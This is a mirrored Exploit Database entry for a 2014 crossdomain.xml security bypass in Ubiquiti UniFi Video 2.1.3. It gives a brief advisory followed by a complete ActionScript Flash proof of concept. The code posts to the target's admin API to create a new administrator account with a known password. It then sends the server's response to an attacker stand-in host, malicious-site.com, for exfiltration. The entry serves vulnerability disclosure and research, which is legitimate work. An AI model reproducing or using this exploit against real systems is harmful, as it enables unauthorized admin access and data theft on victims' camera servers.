Ubiquiti Networks UniFi Video Default – ‘crossdomain.xml’ Security Bypass

• Exploit Database
• 136 阅读

• 作者： Seth Art
  日期： 2014-07-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39268/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  source: https://www.securityfocus.com/bid/68866/info   UniFi Video is prone to a security-bypass vulnerability.   An authenticated attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks.   UniFi Video 2.1.3 is vulnerable; other versions may also be affected.   // Customized AirVision POC Author: Seth Art (sethsec at gmail.com) // POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com) // POC Template Author's github: (https://github.com/gursev/flash-xdomain-xploit) package { import flash.display.Sprite; import flash.events.*; import flash.net.URLRequestMethod; import flash.net.URLRequest; import flash.net.URLLoader; import flash.net.URLRequestHeader;   public class XDomainXploit3 extends Sprite { public function XDomainXploit3() { // Target URL from where the data is to be retrieved var readFrom:String = "https//www.example.com:7443/api/2.0/admin"; var header:URLRequestHeader = new URLRequestHeader("Content-Type", "text/plain; charset=UTF-8"); var readRequest:URLRequest = new URLRequest(readFrom); readRequest.method = URLRequestMethod.POST readRequest.data = "{\"name\":\"csrf-cdp\",\"email\":\"csrf-cdp@gmail.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}"; readRequest.requestHeaders.push(header); var getLoader:URLLoader = new URLLoader(); getLoader.addEventListener(Event.COMPLETE, eventHandler); try { getLoader.load(readRequest); } catch (error:Error) { trace("Error loading URL: " + error); } }     private function eventHandler(event:Event):void { // URL to which retrieved data is to be sent var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php" var sendRequest:URLRequest = new URLRequest(sendTo); sendRequest.method = URLRequestMethod.POST; sendRequest.data = event.target.data; var sendLoader:URLLoader = new URLLoader(); try { sendLoader.load(sendRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } } }